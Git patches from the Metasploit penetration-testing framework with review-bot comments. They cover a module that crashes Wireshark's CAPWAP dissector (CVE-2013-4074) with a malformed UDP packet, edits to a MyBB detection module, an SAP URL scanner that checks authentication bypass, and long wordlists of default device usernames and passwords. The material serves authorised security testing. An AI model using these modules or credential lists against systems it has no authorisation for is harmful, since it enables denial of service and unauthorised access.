+ 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti"
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-4074'],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'process',
+ },
+ 'Payload' =>
+ {
+ 'DisableNops' => 'True',
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Wireshark CAPWAP dissector CRASH',
+ {
+ }
+ ],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Apr 28 2014',
+ 'DefaultTarget' => 0))
+
+ # Protocol capwap needs port 5247 to trigger the dissector in wireshark
+ register_options([ Opt::RPORT(5247) ], self.class)
+
+ end
+
+ def exploit
+
+ connect_udp
+
+ # We send a packet incomplete to crash dissector
+ print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")
+ buf = "\x90" * 18
+ udp_sock.put(buf)
+
+ disconnect_udp
+
+ end
+end
From 06912ac2b6180258b0ef8ead30eedfd15795bc27 Mon Sep 17 00:00:00 2001
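Review bot: The module is added under modules/auxiliary/dos but still declares `class Metasploit3 < Msf::Exploit::Remote` with exploit-only metadata (`Rank`, `Payload`, `Targets`, `DefaultTarget`, `EXITFUNC`) and a `def exploit` entry point; a crash-only module in this tree would normally be `class Metasploit3 < Msf::Auxiliary` with `include Msf::Auxiliary::Dos` and a `run` method, and the status line could then no longer use `target.name`. The `Description` text has a stray `)` on its own line, and the header comment reads `http//metasploit.com/download` without the colon. `DisclosureDate` says 'Apr 28 2014' while the author comment cites a 2013-05-28 report for CVE-2013-4074, so one of the two dates should be confirmed. A reference to the vendor advisory and the fixed Wireshark release would let readers check whether an installation is still affected.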
From: Karmanovskii <fnsnic@gmail.com> Date: Sat, 17 May 2014 16:30:29 +0400 Subject: [PATCH 331/853] Update mybb_get_type_db.rb 1.Changed "Rex::Proto::Http::Client" to "Msf::Exploit::Remote::HttpClient" 2.changed the name of the variable "_Version_server". --- modules/auxiliary/gather/mybb_get_type_db.rb | 54 ++++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index a61c1166d1..e007166e77 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -36,24 +36,24 @@ class Metasploit3 < Msf::Auxiliary def check begin uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_cgi({ - 'uri' => uri, - 'method' => 'GET',}) - if req.nil? + res = send_request_cgi( + { + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }) + if res.nil? print_error("Failed to retrieve webpage.") return Exploit::CheckCode::Unknown end - if req - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end + if res.code != 200 print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") return Exploit::CheckCode::Unknown 
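Review bot: In the new `send_request_cgi` call of `check`, the `Accept`, `Accept-Language`, `User-Agent`, `Accept-Encoding`, `Connection` and `Cookie` entries are passed under `'vars_get'`, so they go out as query-string parameters instead of request headers and the cookie is never sent as a cookie. They belong under `'headers' => { ... }`, with the cookie string under `'cookie'` and the user agent under `'agent'`. The hunk at -99,12 only re-indents the same `'vars_get'` block in the other request, so the defect remains there as well. Because `uri` already carries `?intcheck=1`, adding `vars_get` on top presumably yields a second query part; putting `'intcheck' => '1'` in `vars_get` and leaving the path clean would be clearer. `check` begins before and continues after this hunk.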
@@ -69,19 +69,19 @@ class Metasploit3 < Msf::Auxiliary end #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) + web_server = res['Server'] + if web_server + web_server = " Server Version: #{web_server}".ljust(40) else - _Version_server = " Server Version: unknown".ljust(40) + web_server = " Server Version: unknown".ljust(40) end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) return Exploit::CheckCode::Unknown end rescue RuntimeError => err @@ -99,12 +99,12 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" } }) if response.nil? From dd1a47f31f2464869cb73dae0ab13189b22eb268 Mon Sep 17 00:00:00 2001 
From: sappirate <sappirate@gmail.com> Date: Wed, 26 Mar 2014 21:14:39 +0100 Subject: [PATCH 332/853] Modified sap_icm_urlscan to check for authentication of custom URLs Fixed ruby coding style --- .../auxiliary/scanner/sap/sap_icm_urlscan.rb | 27 ++++++++++++++++--- 1 file changed, 24 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 2cff53d60b..870936569c 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -89,6 +89,8 @@ class Metasploit3 < Msf::Auxiliary urls_to_check.each do |url| check_url(url.strip) end + # check custom URLs + check_urlprefixes else print_error("#{rhost}:#{rport} No response received") end @@ -110,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary case when res.code == 200 - print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)") + print_good("#{rhost}:#{rport} #{url} - does not require authentication (200) (length: #{res.headers['Content-Length']})") when res.code == 403 print_good("#{rhost}:#{rport} #{url} - restricted (403)") when res.code == 401 @@ -129,7 +131,7 @@ class Metasploit3 < Msf::Auxiliary end else - print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)") + print_status("#{rhost}:#{rport} #{url} - not found (No Response code Received)") end end 
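Review bot: In the hunk at -110,7 the 200 branch prints `res.headers['Content-Length']`, which is nil when the server answers with chunked encoding or omits the header, so the message ends in `(length: )`. `res.body.length` reports the size actually received and is always available on a response. The same expression is added to the verb-tampering message in the hunk at -143,9. The enclosing `check_url` method starts and ends outside the hunk.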
@@ -143,9 +145,28 @@ class Metasploit3 < Msf::Auxiliary }, 20) if (res and res.code == 200) - print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering") + print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering (length: #{res.headers['Content-Length']})") else print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") end end + + def check_urlprefixes + # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS. This is how the message server finds out which URLs must be forwarded where." (SAP help) + # -> this disclose custom URLs that are also checked for authentication + res = send_request_cgi({ + 'uri' => "/sap/public/icf_info/urlprefix", + 'method' => 'GET', + 'ctype' => 'text/plain', + }, 20) + if (res and res.code == 200) + res.body.each_line do |line| + if line =~ /PREFIX=/ + url_enc = line.sub(/^PREFIX=/, '') + url_dec = URI.unescape(url_enc).sub(/;/, '') + check_url(url_dec.strip) + end + end + end + end end From 6ec926b573f945e9590b306be292b4152b08a38a Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Sun, 18 May 2014 10:18:07 +0200 Subject: [PATCH 333/853] Added separate users/pass/userpass dictionaries --- .../default_passwords_for_services_unhash.txt | 1214 +++++++++++ .../default_userpass_for_services_unhash.txt | 1787 +++++++++++++++++ .../default_users_for_services_unhash.txt | 915 +++++++++ 3 files changed, 3916 insertions(+) create mode 100644 data/wordlists/default_passwords_for_services_unhash.txt create mode 100644 data/wordlists/default_userpass_for_services_unhash.txt create mode 100644 data/wordlists/default_users_for_services_unhash.txt diff --git a/data/wordlists/default_passwords_for_services_unhash.txt b/data/wordlists/default_passwords_for_services_unhash.txt new file mode 100644 index 0000000000..7203bcda29 --- /dev/null +++ b/data/wordlists/default_passwords_for_services_unhash.txt 
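Review bot: `check_urlprefixes` takes every `PREFIX=` value from the remote response, decodes it and passes it straight to `check_url`, which both requests it and prints it, so the scanned host decides which paths are fetched and what text reaches the operator's console and logs. Keeping only decoded values that look like local paths, for example `next unless url_dec.start_with?('/') && url_dec !~ /[^[:print:]]/`, and printing a status line when `/sap/public/icf_info/urlprefix` does not return 200 would make the behaviour predictable. `URI.unescape` is marked obsolete in Ruby's standard library; `Rex::Text.uri_decode` is the framework's own decoder. `.sub(/;/, '')` removes only the first semicolon, so if the intent is to drop the trailing field separator, cutting the value at the first `;` states that more directly.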
@@ -0,0 +1,1214 @@ +admin + +password +1234 +epicrouter +sysadm +access +root +tech +smcadmin +0 +pass +system +PASSWORD +Symbol +guest +bintec +security +synnet +manager +adtran +motorola +smile +cascade +BRIDGE +netman +super +switch +setup +changeme +operator +user +Cisco +Manager +TJM +apc +cisco +letmein +router +trancell +ascend +friend +NetICs +blender +netscreen +SKY_FOX +public +Master +default +laflaf +cmaker +RSX +Posterie +private +attack +monitor +xdfk9874t3 +netopia +Col2ogro2 +microbusiness +op +OCS +secure +atlantis +sysadmin +5777364 +echo +maint +SESAME +danger +lucenttech2 +d.e.b.u.g +hello +SYSTEM +calvin +xxyyzz +highspeed +123 +Sharp +mysweex +4tas +masterkey +0000 +permit +barricade +support +tslinux +hp.com +recovery +PASSW0RD +engineer +administrator +pwp +isee +NETWORK +JDE +superuser +Super +admin123 +surt +rwa +123456 +NetCache +ADTRAN +USER +test +extendnet +ironport +lp +1111 +PASS +ro +Ascend +_Cisco +MAIL +sitecom +hsadb +CAROLIAN +ADMINISTRATOR +sysAdmin +tini +Helpdesk +SERVICE +PBX +FIELD.SUPPORT +sys +abc123 +1502 +star +MGR.SYS +anicust +Administrator +Intel +12345 +lucenttech1 +secret +piranha +wlsedb +l3 +diamond +naadmin +1988 +radius +MANAGER.SYS +raidzone +3ascotel +HPOFFICE +demo +166816 +Password +zoomadsl +D-Link +l2 +CCC +rw +cgadmin +specialist +NetVCR +COGNOS +q +MServer +cms500 +davox +enquirypw +at4400 +h179350 +asd +240653C9467E45 +atc123 +admin_1 +266344 +WORD +ITF3000 +connect +HPONLY +nmspw +client +comcomcom +speedxess +ROBELLE +uplink +SYS +letacla +FORCE +REMOTE +backdoor +CNAS +22222 +gen2 +medion +admn +56789 +PRODDTA +tellabs#1 +dadmin01 +dhs3mt +SECURITY +changeme! 
+llatsni +adfexc +Asante +!manage +21241036 +TELESUP +crftpw +help +lantronix +netadmin +HP +SUPPORT +VESOFT +$secure$ +OP.OPERATOR +hs7mwxkk +patrol +SUPER +SMDR +1064 +DISC +cellit +INTX3 +inads +tlah +wyse +locatepw +visual +r@p8p0r+ +xbox +TENmanUFactOryPOWER +device +NICONEX +admin1234 +fivranne +acc +31994 +bcimpw +bluepw +PlsChgMe +R1QTPS +ccrusr +MPE +telecom +gen1 +SSA +snmp-Trap +HTTP +mtch +adslolitec +ganteng +bciimpw +browsepw +Admin +change_on_install +changeme2 +Exabyte +rmnetlm +replicator +intel +HPP196 +radware +intermec +mlusr +RJE +LOTUS +initpw +e250changeme +SpIp +adminttd +field +supportpw +MiniAP +RIP000 +XLSERVER +HPP187 +HPP189 +indspw +linga +craft +enter +NAU +rcustpw +AitbISP4eCiG +mtcl +CONV +bcnaspw +NETBASE +REGO +cacadmin +mediator +talent +kermit +x-admin +HPDESK +9999 +ROOT500 +my_DEMARC +volition +GlobalAdmin +4getme2 +UI-PSWD-01 +2222 +UI-PSWD-02 +TCH +Fireport +ILMI +maintpw +supervisor +e500changeme +mu +NULL +custpw +noway +tiaranet +bcmspw +TANDBERG +m1122 +telco +xd +dhs3pms +winterm +craftpw +rwmaint +any@ +looker +none +MANAGER +1234admin +MGR +tuxalize +timely +User +8429 +manage +Babylon +hagpolm1 +scmchangeme +tivonpw +installer +webadmin +pbxk1064 +19920706 +pento +NetSurvibox +D_SYSTPW +3477 +$chwarzepumpe +asecret +10023 +help1954 +corecess +master +Protector +HPWORD +symbol +weblogic +sys/change_on_install +3ep5w2u +8111 +jannie +tomcat +pilou +3ware +ANYCOM +tiger123 +asante +smallbusiness +ntacdmax +w2402 +wlsepassword +kilo1987 +articon +michelangelo +Mau'dib +Serial +ggdaseuaimhrke +maintain +syslib +init +PUBSUB +CTXSYS +bill +60020 +dmr99 +GUEST +06071992 +Trintech +otbu+1 +Multi +babbit +w0rkplac3rul3s +Telecom +qsysopr +imss7.0 +nokia +APPS +isdev +mail +draadloos +qsecofr +default.password +5678 +nimdaten +456 +P@55w0rd! 
+par0t +db2fenc1 +control +isp +QSRV +iDirect +MDSYS +vpasp +TEST +QSECOFR +2501 +leviton +blank +informix +mpegvideo +games +0P3N +hawk201 +scout +qpgmr +admin000 +expert03 +images +surecom +Geardog +symantec +adslroot +xyzzy +adaptec +serial# +BACKUP +stratauser +rootme +!root +webibm +riverhead +COMPANY +DSL +amber +eagle +brightmail +HEWITT +ods +toplayer +OkiLAN +rootpass +wrgg15_di524 +x40rocks +nokai +Admin1 +ImageFolio +iolan +pfsense +sales +iscopy +OEM_TEMP +RSAAppliance +themaster01 +ANS#150 +passwort +welcome +NetSeq +BRIO_ADMIN +citel +oracle +kn1TG7psLu +SYSPASS +lkwpeter +DEV2000_DEMOS +checkfs +USER1 +resumix +HELP +logapp +0RACLE9 +0RACLE8 +57gbzb +qsrvbas +sldkj754 +STRAT_PASSWD +19750407 +USERP +primeos +OEMREP +[^_^] +USER6 +TTPTHA +powerdown +Mau’dib +ORACL3 +nimda +DEMO +2WSXcder +ALLIN1 +sysadmpw +QSRVBAS +ip305Beheer +ACCORD +AQJAVA +LASERWRITER +nsi +PERFSTAT +MBWATCH +protection +unix +OWNER +NETPRIV +AWARD?SW +changethis +SYMPA +REP_OWNER +DCL +dbps +ARCHIVIST +basisk +demos +NETMGR +OAS_PUBLIC +AP +j5Brn9 +MTSSYS +DIGITAL +AUDIOUSER +teX1 +allot +$SRV +0RACLE +nicecti +ROOT +PRINTER +m1link +l1 +trouble +trendimsa1.0 +HOST +ADLDEMO +QS_ADM +AMI +OPER +PO7 +komprie +MAINT +toor +AMISETUP +sp99dd +halt +MSHOME +secacm +3Com +db2admin +Airaya +visor +Wireless +IMEDIA +Biostar +install +primos +infrant1 +Partner +Administrative +USER_TEMPLATE +pnadmin +h6BB +lpadmin +VTAM +TRACE +POSTMASTER +MAILER +QS_WS +sma +system_admin +nobody +Tasmannet +!admin +DISCOVERER_ADMIN +LR-ISDN +TURBINE +GL +PO +AMI_SW +superpass +YES +GATEWAY +PRIMARY +award.sw +lucy99 +pwpw +EMP +cclfb +SITEMINDER +Any +vgnadmin +NEWS +Ektron +Award +AQUSER +UTLESTAT +AMIAMI +netbotz +CHANGE_ON_INSTALL +sap123 +Crystal +Daewuu +ftp +(random +MCUser1 +admpw +rootadmin +PM +ULTIMATE +role1 +enhydra +NF +EVENT +xyzall +rainbow +JETSPEED +PORTAL30_SSO_PS +OO +WKSYS +OPERATNS +ksdjfg934t +merlin +OE +Local +OCITEST +HLT +last +CTXDEMO +zebra +QDBA +LRISDN +tele +WEBCAL01 
+rsadmin +ORACLE +alien +sanfran +ReadOnly +AMIPSWD +MOREAU +abd234 +QNX +dnnhost +sertafu +ORDPLUGINS +telos +ADMIN +adminpass +crash +ACCESS +SDOS_ICSAP +adminpwd +BATCH +GUESTGUEST +SYSMAINT +postmast +DSSYS +award_ps +ZAAADA +MGWUSER +NTCIP +hewlpack +TDOS_ICSAP +ssp +EJSADMIN +damin +INGRES +A.M.I +1322222 +VCSRV +storageserver +ssladmin +CLOTH +shutdown +OEMADM +restoreonly1 +quser +MILLER +trmcnfg +REPORT +aLLy +tour +mountfsys +PROG +iwill +Public +mp3mystic +hpt +peribit +STARTER +GUESTGUE +guardone +daemon +mountsys +ORACLE9 +ORACLE8 +gandalf +backuponly1 +leaves +syspw +blablabla +Compleri +USER3 +OPENSPIRIT +spooml +changeit +wg +Vextrex +qsvr +lynx +Sysop +IMAGEUSER +bsxpass +USER9 +ax400 +OPERATOR +Mau?dib +MASTER +t00lk1t +Daytec +SZYX +CTX_123 +rje +MTRPW +QS_ES +mysecretpassword0* +GPLD +uucp +DBSNMP +TSEUG +SWUSER +8RttoTriz +Operator +honey +accounting +backuprestore1 +PRINT +j322 +Craftr4 +dni +*3noguru +FAX +anon +j256 +USER8 +PORTAL30_SSO_PUBLIC +589721 +WINSABRE +shs +PORTAL30_SSO +ALLIN1MAIL +xo11nE +nms +SYSADM +me +NFI +SECDEMO +AR#Admin# +ORAREGSYS +SNOWMAN +LASER +?award +WLAN_AP +WWW +VAX +Cable-docsis +UNKNOWN +LdapPassword_1 +3 +Zenith +setup/nopasswd +DSGATEWAY +CSMIG +year2000 +umountfsys +BIGO +jstwo +VMS +bpel +viewuser1 +ISPMODE +correct +conexant +ip3000 +COMPIERE +OSP22 +guest1 +FORSE +lesarotl +factory +(unknown) +ip20 +ip21 +QUSER +AWARD +prime +tr650 +poll +j262 +xljlbj +glftpd +Advance +RMAN +mountfs +console +firstsite +SW_AWARD +snake +Gateway +TSUSER +123123 +3098z +cc +nopasswd +WebBoard +SYS1 +BC4J +phpreactor +OPERVAX +Congress +central +WANGTEK +etas +OWA +USER2 +jasperadmin +uClinux +guestgue +FAXUSER +SABRE +ip400 +AMI.KEY +AMI.KEZ +inuvik49 +11111111 +qsrv +PORTAL31 +PORTAL30 +XPRT +zjaaadc +ilom-admin +rdc123 +sysopr +tasmannet +0RACLE8I +store +SER +IP +WEBREAD +ODM +INVALID +WOOD +vertex25 +bin +lineprin +www +dbpass +$rfmngr$ +sync +SYSTEST +user0000 +ilom-operator +HELGA-S +NETNONPRIV +CIDS +primenet +redline 
+muze +MBMANAGER +FND +WINDOWS_PASSTHRU +USER4 +hqadmin +123qwe +BASE +dn_04rjc +uucpadm +FAXWORKS +password1 +EXFSYS +JMUSER +imsa7.0 +NETFRAME +CIS +ciscofw +HLW +brocade1 +pwrchute +Tiny +svcPASS83 +nsa +!ishtar +NeXT +TELEDEMO +AMIDECOD +recover +TRAVEL +efmukl +raritan +PO8 +NAMES +secofr +biostar +USER7 +OWA_PUBLIC +questra +builtin +6071992 +boss +isolation +Q54arwms +PLEX +OLAPDBA +g6PJ +INSTANCE +pixmet2003 +Lund +ibmcel +CMSBATCH +ABCD +AM +condo +Toshiba +familymacintosh +TAHITI +NEWINGRES +AMI?SW +mMmM +man +powerapp +service +VIF_DEV_PWD +WELCOME +Barricade +joeuser +HELPDESK +wlpisystem +prtgadmin +CONCAT +t0ch88 +webmaster +djonet +Compaq +CISINFO +dottie +QS_CB +CDEMORID +nician +MANAG3R +PORTAL30_PUBLIC +nortel +CLERK +FIELD +SECRET123 +Guest +amigosw1 +xmux +SENTINEL +ducati900ss +22222222 +lkw +awkward +TzqF +SYSTEST_CLIG +ODS +axis2 +PAPER +TSDEV +joh316 +dos +hdms +phplist +novell +CISSUS +passw0rd +trade +kronites +QS_CBADM +SYSA +00000000 +STUDENT +SECONDARY +OOOOOOOO +xceladmin +j64 +MTS_PASSWORD +AWARD_SW +AQDEMO +ReadWrite +GWrv +MagiMFP +SnuFG5 +IS_$hostname +badg3r5 +ORASSO +t0ch20x +SH +zeosx +X#1833 +wodj +FOOBAR +SYSMAN +urchin +PORTAL30_DEMO +QS_CS +PlsChgMe! 
+MCUrv +adminadmin +userNotU +AMI~ +ibm +ncadmin +TESTPILOT +Polrty +UETP +QS +MUMBLEFRATZ +AIROPLANE +APPS_MRC +uboot +netgear1 +asd123 +PDP11 +aammii +SLIDEPW +bagabu +Spacve +256256 +INFO +checkfsys +PRODCICS +foolproof +AWARD_PW +MXAGENT +ORACLE8I +no +POWERCARTUSER +QDI +shiva +distrib0 +SUPERVISOR +MIGRATE +CDEMOUCB +c +sysbin +signa +autocad +SWITCHES_SW +WEBDB +aPAf +ncrm +SAMPLE +1 +HCPARK +ALLINONE +nm2user +PATROL +technolgi +MBIU0 +adm +tutor +CHEY_ARCHSVR +software +bbs +Dell +disttech +zbaaaca +prost +ORDSYS +1234567890 +gopher +RM +s!a@m#n$p%c +DECNET +OPERATIONS +PANAMA +SHELVES +4Dgifts +biosstar +NETSERVER +tiny +APC +USER5 +GPFD +12345678 +QS_OS +REPADMIN +DEMO8 +DEMO9 +CDEMO82 +boca +vision2 +umountsys +snmp +USER0 +CDEMOCOR +Rodopi +NONPRIV +tatercounter2000 +qserv +ESSEX +AQ +SAP +VRR1 +fw +FINANCE +ESTORE +fax +VIRUSER +LINK +FNDPUB +BIOS +overseer +checksys +umountfs +DBDCCIC +x6zynd56 +TOAD +mozart +ntpupdate +HARRIS +11111 +DECMAIL +dnnadmin +nsroot +advcomm500349 +dvst10n +SERVICECONSUMER1 +MMO2 +NOC +WWWUSER +SAPR3 +t0talc0ntr0l4! +ODSCOMMON +fal +pixadmin +BIOSPASS +netlink +L2LDEMO +OUTLN +tiger +toshy99 +dbase +nz0u4bbe +fam +bell9 +Oper +RMAIL +exinda +PRIV +barney +biodata +24Banc81 +news +j09F +pw +ilon +award_? +0RACLE39 +0RACLE38 +DEFAULT +AMI!SW +SUPERSECRET +alpine +18140815 +APPUSER +CENTRA +LBACSYS +alfarome +PDP8 +* +lpadm +Everything +bewan +2580 +DIP +Sxyz +mfd +MDDEMO +589589 +SWPRO +DES +fibranne +rodopi +touchpwd= +Tiger +4tugboat +funkwerk +SWORDFISH +657 +SYSLIB +NETCON +STEEL +author +web +PUBSUB1 +D_SYSPW +CATALOG +IBM +RE +MFG +POST +HPLASER +HR +VIDEO +SQL +CMOSPWD +dadmin +wlcsystem diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt new file mode 100644 index 0000000000..8610e57e07 --- /dev/null +++ b/data/wordlists/default_userpass_for_services_unhash.txt 
@@ -0,0 +1,1787 @@ +admin:admin +: +admin: +:admin +admin:password +admin:1234 +root: +Administrator:admin +admin:epicrouter +sysadm:sysadm +:1234 +:password +:access +root:root +tech:tech +:smcadmin +:0 +Administrator: +root:pass +:system +root:admin +:PASSWORD +:Symbol +operator: +guest:guest +admin:bintec +security:security +guest: +debug:synnet +manager:manager +:adtran +admin:motorola +service:smile +:cascade +admin:0 +!root: +user:password +:BRIDGE +netman:netman +super:super +admin:switch +admin:setup +admin:changeme +diag:switch +operator:operator +user:user +user: +Cisco:Cisco +Manager:Manager +DTA:TJM +apc:apc +tech: +:cisco +User: +root:1234 +Admin: +:letmein +cablecom:router +adm: +wradmin:trancell +:ascend +manager:friend +:NetICs +root:blender +netscreen:netscreen +:sysadm +:SKY_FOX +sa: +:public +:Master +setup:setup +root:default +:laflaf +cmaker:cmaker +enable: +MICRO:RSX +login:admin +:Posterie +write:private +root:attack +monitor:monitor +:private +:xdfk9874t3 +netopia:netopia +:Col2ogro2 +admin:microbusiness +op:op +adminview:OCS +op:operator +admin:secure +admin:atlantis +sysadmin:sysadmin +super:5777364 +echo:echo +craft: +adm:cascade +admin:default +maint:maint +comcast:1234 +CSG:SESAME +diag:danger +readonly:lucenttech2 +admin:operator +Manager: +debug:d.e.b.u.g +admin:hello +:SYSTEM +root:ascend +root:calvin +manuf:xxyyzz +cusadmin:highspeed +admin:123 +smc:smcadmin +admin:Sharp +root:password +sweex:mysweex +disttech:4tas +su:super +admin:system +root:changeme +poll:tech +sysadmin:password +SYSDBA:masterkey +anonymous: +:0000 +root:permit +admin:barricade +support:support +root:tslinux +admin:hp.com +recovery:recovery +USERID:PASSW0RD +eng:engineer +administrator:administrator +admin:pwp +admin:isee +NETWORK:NETWORK +JDE:JDE +admin:superuser +Guest: +:Super +admin:admin123 +super:surt +rwa:rwa +admin:123456 +admin:NetCache +:ADTRAN +USER:USER +test:test +admin:extendnet +admin:ironport +lp:lp +:Cisco +administrator: +admin:1111 
+sysadmin:PASS +ro:ro +admin:Ascend +:_Cisco +MAIL:MAIL +ami: +:sitecom +hsa:hsadb +system:password +MGR:CAROLIAN +ADMINISTRATOR:ADMINISTRATOR +admin:sysAdmin +root:tini +admin:smcadmin +:Helpdesk +FIELD:SERVICE +PBX:PBX +netman: +HELLO:FIELD.SUPPORT +system:sys +hscroot:abc123 +1502:1502 +:star +superuser:admin +HELLO:MGR.SYS +sysadm:anicust +Administrator:Administrator +netrangr:attack +:Intel +:12345 +readwrite:lucenttech1 +:secret +piranha:piranha +wlse:wlsedb +admin:cisco +l3:l3 +admin:diamond +none:admin +naadmin:naadmin +public:public +admin:1988 +admin:radius +admin:root +NETOP: +Administrator:letmein +HELLO:MANAGER.SYS +:raidzone +:3ascotel +MANAGER:HPOFFICE +demo:demo +:166816 +User:Password +admin:zoomadsl +D-Link:D-Link +user:public +user:pass +l2:l2 +MGR:CCC +rw:rw +cgadmin:cgadmin +storwatch:specialist +:secure +vcr:NetVCR +OPERATOR:COGNOS +piranha:q +admin:synnet +MDaemon:MServer +root:cms500 +root:davox +jagadmin: +enquiry:enquirypw +at4400:at4400 +support:h179350 +davox:davox +admin:asd +PFCUser:240653C9467E45 +setup:changeme +superuser:superuser +:atc123 +aaa: +root:admin_1 +:266344 +MGR:WORD +topicalt:password +admin2:changeme +1234:1234 +MANAGER:ITF3000 +:connect +FIELD:HPONLY +nms:nmspw +client:client +admin:comcomcom +:speedxess +MGR:ROBELLE +:epicrouter +sys:uplink +OPERATOR:SYSTEM +field:support +MGR:SYS +root:letacla +:FORCE: +deskman:changeme +MAIL:REMOTE +SYSADM:sysadm +superadmin:secret +:backdoor +pmd: +MGR:CNAS +admin:22222 +GEN2:gen2 +:medion +ADMN:admn +Factory:56789 +PRODDTA:PRODDTA +tellabs:tellabs#1 +spcl:0 +dadmin:dadmin01 +:comcomcom +administrator:password +helpdesk:OCS +dhs3mt:dhs3mt +MGR:SECURITY +setup:changeme! 
+install:llatsni +adfexc:adfexc +IntraSwitch:Asante +manage:!manage +superman:21241036 +MANAGER:TELESUP +craft:crftpw +login:0 +:help +MGR:HPOFFICE +:lantronix +SPOOLMAN:HPOFFICE +manager:admin +:netadmin +ADVMAIL:HP +FIELD:SUPPORT +MANAGER:SYS +MGR:VESOFT +vt100:public +PSEAdmin:$secure$ +HELLO:OP.OPERATOR +Manager:friend +:hs7mwxkk +patrol:patrol +:SUPER +:SMDR +:1064 +teacher:password +PCUSER:SYS +MGR:ITF3000 +Any:12345 +OPERATOR:DISC +RSBCMON:SYS +cellit:cellit +MGR:INTX3 +inads:inads +halt:tlah +root:wyse +locate:locatepw +admin:visual +TMAR#HWMT8007079: +rapport:r@p8p0r+ +MGR:TELESUP +xbox:xbox +:TENmanUFactOryPOWER +device:device +NICONEX:NICONEX +admin:admin1234 +root:fivranne +acc:acc +31994:31994 +admin:netadmin +bcim:bcimpw +websecadm:changeme +blue:bluepw +topicnorm:password +supervisor:PlsChgMe +:R1QTPS +MGR:HPONLY +ccrusr:ccrusr +root:Cisco +login:password +266344:266344 +MAIL:MPE +telecom:telecom +MAIL:HPOFFICE +GEN1:gen1 +Administrator:smcadmin +SSA:SSA +:snmp-Trap +HTTP:HTTP +:default +mtch:mtch +admin:adslolitec +Administrator:ganteng +bciim:bciimpw +browse:browsepw +Admin:Admin +:Password +hydrasna: +sys:change_on_install +deskres:password +bbsd-client:changeme2 +anonymous:Exabyte +admin:rmnetlm +replicator:replicator +intel:intel +OPERATOR:SUPPORT +MGR:HPP196 +radware:radware +intermec:intermec +mlusr:mlusr +MGR:RJE +FIELD:LOTUS +init:initpw +e250:e250changeme +MAIL:TELESUP +Polycom:SpIp +temp1:password +:adminttd +tech:field +support:supportpw +mac: +:MiniAP +MANAGER:SECURITY +3comcso:RIP000 +RMUser1:password +WP:HPOFFICE +Administrator:changeme +MGR:XLSERVER +MGR:HPP187 +MGR:HPP189 +inads:indspw +admin:linga +craft:craft +:enter +NAU:NAU +rcust:rcustpw +admin:AitbISP4eCiG +mtcl:mtcl +MGR:CONV +topicres:password +bcnas:bcnaspw +MGR:NETBASE +admin:access +public: +adminuser:OCS +MGR:REGO +Root: +cac_admin:cacadmin +mediator:mediator +superman:talent +Anonymous: 